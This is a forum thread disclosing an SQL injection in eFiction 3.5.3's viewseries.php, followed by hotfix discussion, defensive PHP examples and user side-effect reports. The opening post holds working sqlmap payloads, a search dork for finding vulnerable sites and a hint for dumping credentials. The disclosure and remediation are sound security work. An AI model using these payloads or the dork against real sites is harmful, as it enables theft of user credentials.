Hello ...
The viewseries.php page in eFiction 3.5.3 is vulnerable to an SQL Injection attack.
The page loads the URL parameter "seriesid":
$seriesid = isset($_GET['seriesid']) ? $_GET['seriesid'] : false;
Then it passes the *tainted* value directly down to the database:
$parents = dbquery("SELECT s.title, s.seriesid FROM ".TABLEPREFIX."fanfiction_inseries as i,
".TABLEPREFIX."fanfiction_series as s WHERE s.seriesid = i.seriesid AND i.subseriesid = '$seriesid'");
This allows an attacker to extract information from the underlying database.
sqlmap identified the following injection points with a total of 396 HTTP(s) requests:
---
Place: GET
Parameter: seriesid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: seriesid=1' AND 9530=9530 AND 'xaMV'='xaMV
Type: error-based
Title: MySQL >= 4.1 OR error-based - WHERE or HAVING clause
Payload: seriesid=-1947' OR ROW(2257,7329)>(SELECT COUNT(*),CONCAT(0x716e656e71,(SELECT (CASE WHEN (2257=2257) THEN 1 ELSE 0 END)),0x716c746b71,FLOOR(RAND(0)*2))x FROM (SELECT 7852 UNION SELECT 4197 UNION SELECT 3571 UNION SELECT 7903)a GROUP BY x) AND 'zplx'='zplx
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: seriesid=1' AND SLEEP(5) AND 'hXxL'='hXxL
---
[20:37:41] [INFO] testing MySQL
[20:37:42] [INFO] confirming MySQL
[20:37:45] [INFO] the back-end DBMS is MySQL
[20:37:45] [INFO] fetching banner
[20:37:45] [INFO] retrieving the length of query output
[20:37:45] [INFO] retrieved: 20
[20:38:25] [INFO] retrieved: 5.1.69-community-log
[20:38:25] [INFO] actively fingerprinting MySQL
[20:38:28] [INFO] executing MySQL comment injection fingerprint
web application technology: Apache, PHP 5.2.17
back-end DBMS: active fingerprint: MySQL >= 5.1.12 and < 5.5.0
banner parsing fingerprint: MySQL 5.1.69, logging enabled
banner: '5.1.69-community-log'
Vulnerable sites can be found using Google by executing this search:
inurl:"viewseries.php?seriesid="
The complete list of usernames/passwords can be obtained by dumping the fanfiction_authors table.
Anybody running eFiction 3.5.3 should be advised that their user credentials are available to the public.
... Robert
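The fix a defender would want for the query quoted in the post above, as an added example that is neither eFiction's own code nor the hotfix discussed later in this thread: reject any seriesid that is not a positive integer, then bind the value with a mysqli prepared statement so the database receives it as data rather than as part of the SQL text. Assumptions: PHP 7.0 or later, a mysqli connection in $db, the application's TABLEPREFIX constant, and the mysqlnd driver for get_result(); the function names are mine.

```php
<?php
// Added example (not eFiction's code): the viewseries.php lookup rewritten
// so the "seriesid" parameter can never be interpolated into the SQL string.
// Assumed: $db is a mysqli connection and TABLEPREFIX is defined by the app.
declare(strict_types=1);

/**
 * Validate the untrusted seriesid. Series ids are integers, so anything that
 * is not a string of digits is rejected before any database work happens;
 * every payload in the sqlmap output above fails this check.
 */
function parseSeriesId($raw): ?int
{
    if (!is_string($raw) || !ctype_digit($raw)) {
        return null;
    }
    $id = (int) $raw;
    return $id > 0 ? $id : null;
}

/**
 * Fetch parent series with a prepared statement. The table names come from
 * the trusted TABLEPREFIX constant; the only user-controlled value is bound
 * as an integer parameter, so the DBMS never parses it as SQL.
 */
function fetchParentSeries(mysqli $db, int $subSeriesId): array
{
    $sql = 'SELECT s.title, s.seriesid'
         . ' FROM ' . TABLEPREFIX . 'fanfiction_inseries AS i'
         . ' JOIN ' . TABLEPREFIX . 'fanfiction_series AS s ON s.seriesid = i.seriesid'
         . ' WHERE i.subseriesid = ?';
    $stmt = $db->prepare($sql);
    $stmt->bind_param('i', $subSeriesId);
    $stmt->execute();
    $rows = $stmt->get_result()->fetch_all(MYSQLI_ASSOC);  // needs mysqlnd
    $stmt->close();
    return $rows;
}

// Same shape as the original line: false/abort when the id is missing or bad.
$seriesid = parseSeriesId($_GET['seriesid'] ?? null);
if ($seriesid === null) {
    http_response_code(400);
    exit('Invalid series id');
}
$parents = fetchParentSeries($db, $seriesid);
```

The two layers are independent: the integer check stops the request early and gives a clean 400, while the bound parameter protects the query even for a column where free text must be accepted and a whitelist is not possible.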
I did this change, but now when I click the submit button everything is OK, but when I want to echo the inserted text it shows "rn" between the lines (in the database it shows rn). I tried to remove these tags, but they don't disappear. How could I remove these tags?
(You can skip step 2 if you know you are using the mysqli extension; if you are not sure, better do it.)
Step 2:
Open includes/mysqli_functions.php, find at or around line 56:

// Used to escape text being put into the database.
function escapestring($str) {
    if(version_compare(phpversion(),"4.3.0")=="-1") {
        $str = mysql_escape_string($str);
    } else {
        $str = mysql_real_escape_string($str);
    }
    return $str;
}

Modify to:

// Used to escape text being put into the database.
function escapestring($str) {
    if (!is_array($str)) return mysql_real_escape_string($str);
    else return array_map('escapestring', $str);
}

This will no longer probe for PHP versions before 4.3.0, but honestly, this would mean your web server has not been updated since around 2003.
I couldn't find that code in includes/mysqli_functions.php but could in includes/mysql_functions.php, so was assuming there's a tiny typo in step 2 or am I wrong and my files are different than expected somehow?
Holy Batman, fired a bit too far here ^^
I changed the instructions above, in short terms: changes in the config.php modification, edit an additional file.
Thank you, now its ok
Thank you for getting on this so quick!
Series doesn't show with
$seriesid = (isset($_GET['seriesid']) && is_numeric($_GET['seriesid'])) ? escapestring($_GET['seriesid']) : false;
I get an error on line 39 of viewseries.php.
But it's OK if I use:
$seriesid = isset($_GET['seriesid']) && is_numeric($_GET['seriesid']) ? escapestring($_GET['seriesid']) : false;
I don't know if it is OK to use this last code.
Whoa - thanks Robert for the quick spot and thanks Sheepie for the fix.
A quick search didn't find those lines of code in the files. There was similar code but not the same.
Please hurry up on the fixed version as at least I can upload that!
Thank you, Robert for pointing this out, and thank you, Sheepcontrol for working on the fix.
I wanted to point out that the 2 lines of code that were previously added to the config.php file, and now are listed for the dbfuctions.php file:
$_GET = array_map('stripslashes', $_GET);
$_POST = array_map('stripslashes', $_POST);
May help with the SQL injection issue, but they throw off some of the site functionality. A member of my site emailed me to let me know that when she was trying to add a challenge, the site wouldn't save the characters she was trying to tie to the challenge. I checked, and she was correct. It looks like any input that comes from a box where multiple options can be chosen is being disregarded (for ex. in the advanced search it won't use selected classtypes to include/exclude).
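As an added example (not from the hotfix or from eFiction), why the two array_map('stripslashes', ...) lines quoted above lose multi-select inputs, and a recursive replacement that keeps them and only runs when magic_quotes_gpc actually added slashes. The $postSample array is constructed to look like what PHP builds for a form with a text field and a multi-select "classtype[]" field; the function names are mine.

```php
<?php
// Added example, not eFiction's code or the hotfix. Shows why a flat
// array_map('stripslashes', $_POST) drops multi-select fields and how a
// recursive, guarded version avoids that.

// Constructed sample: a text field plus a multi-select "classtype[]" field,
// with magic_quotes_gpc having added backslashes to the text.
$postSample = [
    'title'     => "O\\'Brien\\'s challenge",   // stored as O\'Brien\'s challenge
    'classtype' => ['3', '7'],                 // multi-select values arrive as a nested array
];

// stripslashes() only accepts strings. Handed the nested 'classtype' array it
// warns and returns NULL on PHP 5/7 (a TypeError on PHP 8), so the selected
// options vanish, which matches the symptom described in the post above.
function stripslashesFlat(array $input): array
{
    return array_map(static function ($v) {
        // Emulates the hotfix line without triggering the warning/TypeError.
        return is_string($v) ? stripslashes($v) : null;
    }, $input);
}

// Recursive version: descends into nested arrays and leaves non-strings alone.
function stripslashesDeep($value)
{
    if (is_array($value)) {
        return array_map('stripslashesDeep', $value);
    }
    return is_string($value) ? stripslashes($value) : $value;
}

// Only undo slashes that PHP actually added. magic_quotes_gpc was removed in
// PHP 5.4 and get_magic_quotes_gpc() itself is gone in PHP 8, so on a modern
// server nothing is stripped and text containing literal backslashes (for
// example a "\r\n" sequence typed into the editor) is not mangled into "rn".
function undoMagicQuotes(array $input): array
{
    if (function_exists('get_magic_quotes_gpc') && get_magic_quotes_gpc()) {
        return stripslashesDeep($input);
    }
    return $input;
}

var_dump(stripslashesFlat($postSample)['classtype']);  // NULL: options lost
var_dump(stripslashesDeep($postSample)['classtype']);  // ["3", "7"]: kept
var_dump(stripslashesDeep($postSample)['title']);      // "O'Brien's challenge"
```

Either way this is cleanup for magic_quotes, not protection against SQL injection; that still has to come from escapestring() or, better, prepared statements at the point where the query is built.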
UPDATE: zip-archive attached with the modified files.
Updated package is postponed, also, until this fix has become somewhat stable.
Sheep, I think you are great to tackle this problem but I'm confused... is there an attachment on your post or not? I see a paperclip on the header like there is an attachment but I could find no link. I will attempt to manually alter my files, but if I do, will I screw something up? Seems like there are some unpredictable results.
******************************************
Mucking around in eFiction since circa 2001 (ver. 1.0)
Now running v.3
Darn, that's what I was fearing. Well, as I said, I don't know the code very well, ok, scratch that as well - I need to finish v5 ASAP
Hey I'm ready to beta test v5 whenever you are ready. :agree:
I'm getting a bunch of reports from authors stating that "rn" is being added to each line since I applied the hotfix. Here's an example:
http://www.adastrafanfic.com/viewstory.php?sid=2061&chapter=37
No matter what I do on the HTML editor side, I cannot remove those characters. They persist over and over.
-- jb
Archive: Ad Astra Star Trek Fanfiction Archive
Version: 3.5.3
Skin: One of Kali's, but I'm not sure. It's been heavily modded.
PHP: 7.4.27
MySQL: 5.7.36
Can I get a post of Step 3 so I can back out the changes?
-- Jb
EDIT: Nevermind. I found it and edited it out.
I'd also be up for doing any beta testing when you are ready.
http://www.FicSavers.Com
http://www.HPFanFicArchive.Com
http://www.FavoritesTracker.Org
It seems to be. Once I backed out the config.php changes, all of the weird extra characters disappeared when I did the hand-edits to the HTML input editor.
-- jb
